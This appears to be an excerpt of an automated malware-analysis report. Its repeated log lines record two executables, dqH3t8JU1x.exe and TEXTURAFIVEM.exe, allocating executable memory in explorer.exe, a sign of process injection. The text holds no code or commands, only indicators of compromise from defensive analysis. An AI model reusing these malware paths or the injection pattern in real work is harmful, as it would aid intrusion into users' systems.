            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3350000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 33F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3600000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3610000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3620000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3630000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3640000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3650000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3660000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3670000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3680000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3690000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BA0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5490000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5510000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5600000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5700000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5710000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5800000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5810000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5900000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5C10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 24010000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3370000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5070000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5080000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5090000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50E0000 protect: page execute and read and writeJump to behavior
